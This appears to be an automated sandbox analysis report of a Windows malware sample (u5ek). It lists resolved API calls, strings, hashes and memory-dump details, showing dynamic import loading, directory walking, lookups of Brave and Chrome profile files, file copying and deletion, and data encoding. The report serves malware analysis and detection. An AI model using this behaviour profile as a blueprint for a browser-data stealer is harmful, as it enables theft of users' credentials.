GetProcAddress.KERNEL32(74DD0000,042F6448), ref: 0041642B
GetProcAddress.KERNEL32(74DD0000,042F61A8), ref: 00416444
GetProcAddress.KERNEL32(74DD0000,042F6208), ref: 0041645C
GetProcAddress.KERNEL32(74DD0000,042F6298), ref: 00416474
GetProcAddress.KERNEL32(74DD0000,042D44B8), ref: 0041648D
GetProcAddress.KERNEL32(74DD0000,042F62B0), ref: 004164A5
GetProcAddress.KERNEL32(74DD0000,042F61C0), ref: 004164BD
GetProcAddress.KERNEL32(74DD0000,042F6250), ref: 004164D6
GetProcAddress.KERNEL32(74DD0000,042F6310), ref: 004164EE
GetProcAddress.KERNEL32(74DD0000,042F6358), ref: 00416506
GetProcAddress.KERNEL32(74DD0000,042F6328), ref: 0041651F
GetProcAddress.KERNEL32(74DD0000,042F6268), ref: 00416537
GetProcAddress.KERNEL32(74DD0000,042F6220), ref: 0041654F
GetProcAddress.KERNEL32(74DD0000,042F6280), ref: 00416568
GetProcAddress.KERNEL32(74DD0000,042F2258), ref: 00416580
GetProcAddress.KERNEL32(74DD0000,042F6400), ref: 00416598
GetProcAddress.KERNEL32(74DD0000,042F6238), ref: 004165B1
GetProcAddress.KERNEL32(74DD0000,042D4418), ref: 004165C9
GetProcAddress.KERNEL32(74DD0000,042F6460), ref: 004165E1
GetProcAddress.KERNEL32(74DD0000,042D44D8), ref: 004165FA
GetProcAddress.KERNEL32(74DD0000,042F6370), ref: 00416612
GetProcAddress.KERNEL32(74DD0000,042F63E8), ref: 0041662A
GetProcAddress.KERNEL32(74DD0000,042D4598), ref: 00416643
GetProcAddress.KERNEL32(74DD0000,042D45D8), ref: 0041665B
LoadLibraryA.KERNEL32(042F62E0,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 0041666D
LoadLibraryA.KERNEL32(042F6388,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 0041667E
LoadLibraryA.KERNEL32(042F61D8,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 00416690
LoadLibraryA.KERNEL32(042F63A0,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166A2
LoadLibraryA.KERNEL32(042F63B8,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166B3
LoadLibraryA.KERNEL32(042F63D0,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166C5
LoadLibraryA.KERNEL32(042F6418,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166D7
LoadLibraryA.KERNEL32(042F6430,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166E8
GetProcAddress.KERNEL32(75290000,042D4438), ref: 0041670A
GetProcAddress.KERNEL32(75290000,042F6190), ref: 00416722
GetProcAddress.KERNEL32(75290000,042F0788), ref: 0041673A
GetProcAddress.KERNEL32(75290000,042F6490), ref: 00416753
GetProcAddress.KERNEL32(75290000,042D4498), ref: 0041676B
GetProcAddress.KERNEL32(6FDD0000,042EFBD8), ref: 00416790
GetProcAddress.KERNEL32(6FDD0000,042D4538), ref: 004167A9
GetProcAddress.KERNEL32(6FDD0000,042EFC00), ref: 004167C1
GetProcAddress.KERNEL32(6FDD0000,042F64A8), ref: 004167D9
GetProcAddress.KERNEL32(6FDD0000,042F64C0), ref: 004167F2
GetProcAddress.KERNEL32(6FDD0000,042D42F8), ref: 0041680A
GetProcAddress.KERNEL32(6FDD0000,042D4558), ref: 00416822
GetProcAddress.KERNEL32(6FDD0000,042F64D8), ref: 0041683B
GetProcAddress.KERNEL32(752C0000,042D4638), ref: 0041685C
GetProcAddress.KERNEL32(752C0000,042D44F8), ref: 00416874
GetProcAddress.KERNEL32(752C0000,042F6520), ref: 0041688D
GetProcAddress.KERNEL32(752C0000,042F6508), ref: 004168A5
GetProcAddress.KERNEL32(752C0000,042D4298), ref: 004168BD
GetProcAddress.KERNEL32(74EC0000,042EF868), ref: 004168E3
GetProcAddress.KERNEL32(74EC0000,042EFCA0), ref: 004168FB
GetProcAddress.KERNEL32(74EC0000,042F6550), ref: 00416913
GetProcAddress.KERNEL32(74EC0000,042D4358), ref: 0041692C
GetProcAddress.KERNEL32(74EC0000,042D4578), ref: 00416944
GetProcAddress.KERNEL32(74EC0000,042EF8E0), ref: 0041695C
GetProcAddress.KERNEL32(75BD0000,042F64F0), ref: 00416982
GetProcAddress.KERNEL32(75BD0000,042D42D8), ref: 0041699A
GetProcAddress.KERNEL32(75BD0000,042F08C8), ref: 004169B2
GetProcAddress.KERNEL32(75BD0000,042F6538), ref: 004169CB
GetProcAddress.KERNEL32(75BD0000,042F67F0), ref: 004169E3
GetProcAddress.KERNEL32(75BD0000,042D4318), ref: 004169FB
GetProcAddress.KERNEL32(75BD0000,042D4458), ref: 00416A14
GetProcAddress.KERNEL32(75BD0000,042F65F8), ref: 00416A2C
GetProcAddress.KERNEL32(75BD0000,042F6868), ref: 00416A44
GetProcAddress.KERNEL32(75A70000,042D4338), ref: 00416A66
GetProcAddress.KERNEL32(75A70000,042F6808), ref: 00416A7E
GetProcAddress.KERNEL32(75A70000,042F6778), ref: 00416A96
GetProcAddress.KERNEL32(75A70000,042F65C8), ref: 00416AAF
GetProcAddress.KERNEL32(75A70000,042F6610), ref: 00416AC7
GetProcAddress.KERNEL32(75450000,042D45B8), ref: 00416AE8
GetProcAddress.KERNEL32(75450000,042D4478), ref: 00416B01
GetProcAddress.KERNEL32(75DA0000,042D43B8), ref: 00416B22
GetProcAddress.KERNEL32(75DA0000,042F6718), ref: 00416B3A
GetProcAddress.KERNEL32(6F090000,042D4518), ref: 00416B60
GetProcAddress.KERNEL32(6F090000,042D4398), ref: 00416B78
GetProcAddress.KERNEL32(6F090000,042F72A0), ref: 00416B90
GetProcAddress.KERNEL32(6F090000,042F67D8), ref: 00416BA9
GetProcAddress.KERNEL32(6F090000,042F7400), ref: 00416BC1
GetProcAddress.KERNEL32(6F090000,042F7320), ref: 00416BD9
GetProcAddress.KERNEL32(6F090000,042F72C0), ref: 00416BF2
GetProcAddress.KERNEL32(6F090000,042F7340), ref: 00416C0A
GetProcAddress.KERNEL32(75AF0000,042F6628), ref: 00416C2B
GetProcAddress.KERNEL32(75AF0000,042F07C8), ref: 00416C44
GetProcAddress.KERNEL32(75AF0000,042F66B8), ref: 00416C5C
GetProcAddress.KERNEL32(75AF0000,042F6640), ref: 00416C74
GetProcAddress.KERNEL32(75D90000,042F72E0), ref: 00416C96
GetProcAddress.KERNEL32(6CA80000,042F6658), ref: 00416CB7
GetProcAddress.KERNEL32(6CA80000,042F7300), ref: 00416CCF
GetProcAddress.KERNEL32(6CA80000,042F6598), ref: 00416CE8
GetProcAddress.KERNEL32(6CA80000,042F6880), ref: 00416D00

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: ce70c898548f88182f5d017b929846a165f52d01e2510d34cdd7b30da02966dd
Instruction ID: 6fdcbfc83a7e6ced85b92bf4002cf1d70b18d179e1e2f66c0d1faa926a602d30
Opcode Fuzzy Hash: ce70c898548f88182f5d017b929846a165f52d01e2510d34cdd7b30da02966dd
Instruction Fuzzy Hash: 6E623EB5510E10AFC374DFA8FE88A1637ABBBCC311311A519A60AC72A4DF759483CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00411650 Relevance: 44.0, APIs: 20, Strings: 5, Instructions: 237
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00411669
FindFirstFileA.KERNEL32(?,?), ref: 00411680
lstrcat.KERNEL32(?,?), ref: 004116D2
StrCmpCA.SHLWAPI(?,0041D7F8), ref: 004116E4
StrCmpCA.SHLWAPI(?,0041D7FC), ref: 004116FA
FindNextFileA.KERNELBASE(000000FF,?), ref: 00411980
FindClose.KERNEL32(000000FF), ref: 00411995

Strings

%s%s, xrefs: 00411838
%s\%s\%s, xrefs: 004117DB
%s\%s, xrefs: 004117FD
%s\*, xrefs: 0041165D
%s\%s, xrefs: 00411714

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextlstrcatwsprintf
String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
API String ID: 1125553467-2524465048
Opcode ID: dc165bfe059858b008f46a8c8689db8cb5fddec1d4dee71b8375d3b2251b46db
Instruction ID: 56f1237c2d7c520c90c98f1ce5fb3a6d9b51b415e2d0c2f733ce4a2014328567
Opcode Fuzzy Hash: dc165bfe059858b008f46a8c8689db8cb5fddec1d4dee71b8375d3b2251b46db
Instruction Fuzzy Hash: AE9172B19006189BDB24EFA4DC85FEA737DBF88300F044589F61A92191DB789AC5CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040B610 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

FindFirstFileA.KERNEL32(00000000,?,0041D71A,0041D717,00000000,?,?,?,0041DB54,0041D716), ref: 0040B695
StrCmpCA.SHLWAPI(?,0041DB58), ref: 0040B6ED
StrCmpCA.SHLWAPI(?,0041DB5C), ref: 0040B703
FindNextFileA.KERNELBASE(000000FF,?), ref: 0040BF3B
FindClose.KERNEL32(000000FF), ref: 0040BF4D

Strings

Preferences, xrefs: 0040B8BE
\Brave\Preferences, xrefs: 0040B97B
Google Chrome, xrefs: 0040BDB9
Brave, xrefs: 0040B8A2

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-726946144
Opcode ID: 7c9c9f1912102b1f3f3d451c73bf9befd1c369b3dea277ffdfa703e8cc0b22b3
Instruction ID: 76d401781d3fce7c968e745dc043d6a6225f477281f2400f678919b217ba5a4c
Opcode Fuzzy Hash: 7c9c9f1912102b1f3f3d451c73bf9befd1c369b3dea277ffdfa703e8cc0b22b3
Instruction Fuzzy Hash: 0F423572A0010457CF14FB61DC56EEE773DAF84304F41455EF90AA6181EE38AB89CBE9

Uniqueness

Uniqueness Score: -1.00%

Function 6BB735A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6BBFF688,00001000), ref: 6BB735D5
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6BB735E0
QueryPerformanceFrequency.KERNEL32(?), ref: 6BB735FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6BB7363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6BB7369F
__aulldiv.LIBCMT ref: 6BB736E4
QueryPerformanceCounter.KERNEL32(?), ref: 6BB73773
EnterCriticalSection.KERNEL32(6BBFF688), ref: 6BB7377E
LeaveCriticalSection.KERNEL32(6BBFF688), ref: 6BB737BD
QueryPerformanceCounter.KERNEL32(?), ref: 6BB737C4
EnterCriticalSection.KERNEL32(6BBFF688), ref: 6BB737CB
LeaveCriticalSection.KERNEL32(6BBFF688), ref: 6BB73801
__aulldiv.LIBCMT ref: 6BB73883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6BB73902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6BB73918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6BB7394C

Strings

GTC, xrefs: 6BB73912
QPC, xrefs: 6BB738FC
MOZ_TIMESTAMP_MODE, xrefs: 6BB735DB
GenuntelineI, xrefs: 6BB73639
AuthcAMDenti, xrefs: 6BB73946

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
API String ID: 301339242-3790311718
Opcode ID: 70cc32eb8a1677bb8642619136fb9a61be109be63b31b48e310d7dd343081873
Instruction ID: aaf3555ab2df8270d78d79faa6849b77d0b936a72d3931109d7039f862b9424e
Opcode Fuzzy Hash: 70cc32eb8a1677bb8642619136fb9a61be109be63b31b48e310d7dd343081873
Instruction Fuzzy Hash: 80B1B4B1A093509FDB18DF68D84462ABBEAFB8A700F04893EE999D3350DB35D905CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00412570 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00412589
FindFirstFileA.KERNEL32(?,?), ref: 004125A0
StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
FindClose.KERNEL32(000000FF), ref: 004127CE

Strings

%s\*, xrefs: 0041257D
%s\%s, xrefs: 004125FE
%s\%s, xrefs: 0041264F

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*
API String ID: 180737720-445461498
Opcode ID: 70f66335c68ee9bee9e93ad0ea58b8d0e5d9bc99c8bb7c2902da79831dca3d0c
Instruction ID: 16fd5a9597efbfb91ed0225017393bb16e0f77851f83799e5682f8bc7922baf0
Opcode Fuzzy Hash: 70f66335c68ee9bee9e93ad0ea58b8d0e5d9bc99c8bb7c2902da79831dca3d0c
Instruction Fuzzy Hash: 676156B2900618ABCB24EBE0DD99EEA737DBF58701F00458DB61A96140EF74DB85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00411B80 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00411B9D
FindFirstFileA.KERNEL32(?,?), ref: 00411BB4
StrCmpCA.SHLWAPI(?,0041D834), ref: 00411BE2
StrCmpCA.SHLWAPI(?,0041D838), ref: 00411BF8
FindNextFileA.KERNEL32(000000FF,?), ref: 00411D3D
FindClose.KERNEL32(000000FF), ref: 00411D52

Strings

%s\%s, xrefs: 00411B91

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: 8a2a5c367229f5874a14f57b428850a66a498e63ff653c6488f4aaaa7e785072
Instruction ID: 1beca0db89a34a7d9f561fb59a57ff38f1a0216f2a844ef05cbde65d1a44dc5a
Opcode Fuzzy Hash: 8a2a5c367229f5874a14f57b428850a66a498e63ff653c6488f4aaaa7e785072
Instruction Fuzzy Hash: D75168B5900618ABCB24EBB0DC85EEA737DBB48304F40458DB65A96050EB79ABC5CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004015C0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215C4,?,00401E03,?,004215C8,?,?,00000000,?,00000000), ref: 00401813
StrCmpCA.SHLWAPI(?,004215CC), ref: 00401863
StrCmpCA.SHLWAPI(?,004215D0), ref: 00401879
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401C30
DeleteFileA.KERNEL32(00000000), ref: 00401CB4
FindNextFileA.KERNEL32(000000FF,?), ref: 00401D0A
FindClose.KERNEL32(000000FF), ref: 00401D1C

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Strings

\*.*, xrefs: 004016E1

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: f8b2ac61337480ab1d8cc55f87738a585f7c4a46595bf6ff6cbfdc8e476e5ad3
Instruction ID: 3aa4ae790513c502dab12fd0122e5550b13815c0fff8c800b600eb4522263f51
Opcode Fuzzy Hash: f8b2ac61337480ab1d8cc55f87738a585f7c4a46595bf6ff6cbfdc8e476e5ad3
Instruction Fuzzy Hash: D41225759102189BCB15FB61DC56EEE7739AF54308F41419EB10A62091EF38AFC9CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040D1C0 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0041DC10,0041D73F), ref: 0040D22B
StrCmpCA.SHLWAPI(?,0041DC14), ref: 0040D273
StrCmpCA.SHLWAPI(?,0041DC18), ref: 0040D289
FindNextFileA.KERNELBASE(000000FF,?), ref: 0040D4EE
FindClose.KERNEL32(000000FF), ref: 0040D500

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: 8fa573c4bf8f32931b9ea9eba06e67935ab5fae2b205d85bdf9771007900e629
Instruction ID: a7e743a2a4f5118c59e4eb5b7e6cabc454f6fbff0e67e47d23a58287cf68124a
Opcode Fuzzy Hash: 8fa573c4bf8f32931b9ea9eba06e67935ab5fae2b205d85bdf9771007900e629
Instruction Fuzzy Hash: 63913B72A0020497CB14FFB1EC569EE777DAB84308F41466EF90A96581EE38D788CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 00414570 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

GetKeyboardLayoutList.USER32(00000000,00000000,0041D146), ref: 0041459E
LocalAlloc.KERNEL32(00000040,?), ref: 004145B6
GetKeyboardLayoutList.USER32(?,00000000), ref: 004145CA
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041461F
LocalFree.KERNEL32(00000000), ref: 004146DF

Strings

/ , xrefs: 0041463C

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: b3ae68a3938c9e06bcd6eabfd82ee92d7aff8f0056ccf05280facd273a8cc3fa
Instruction ID: e4a09482d03fe0ac07b2aa12fe49ef9b635f824a972481fa3f662a7a2871ed61
Opcode Fuzzy Hash: b3ae68a3938c9e06bcd6eabfd82ee92d7aff8f0056ccf05280facd273a8cc3fa
Instruction Fuzzy Hash: D5413B74940218ABCB24DF50DC89BEDB775BB54308F2042DAE10A66191DB786FC5CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0040DB60 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,0041D74E), ref: 0040DBD2
StrCmpCA.SHLWAPI(?,0041DC58), ref: 0040DC22
StrCmpCA.SHLWAPI(?,0041DC5C), ref: 0040DC38
FindNextFileA.KERNEL32(000000FF,?), ref: 0040E306

Strings

\*.*, xrefs: 0040DB7D

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: \*.*
API String ID: 433455689-1173974218
Opcode ID: f7475b116a4597a1daddea1d9ec65d66a476fb48a19e70ace4414c8071cd6ccd
Instruction ID: 8f23b39e961a58df861ec407c7814dc8b58ae9c3eb94c511c30fb23e96a564a4
Opcode Fuzzy Hash: f7475b116a4597a1daddea1d9ec65d66a476fb48a19e70ace4414c8071cd6ccd
Instruction Fuzzy Hash: 88126771A002145ACB14FB61DC56EED7739AF54308F4142AEB50A66091EF389FC8CFE8

Uniqueness

Uniqueness Score: -1.00%

Function 004155A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(00000000,>N@,40000001,00000000,00000000), ref: 004155C0

Strings

>N@, xrefs: 004155B8, 00415614, 004155BB, 00415617

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: BinaryCryptString
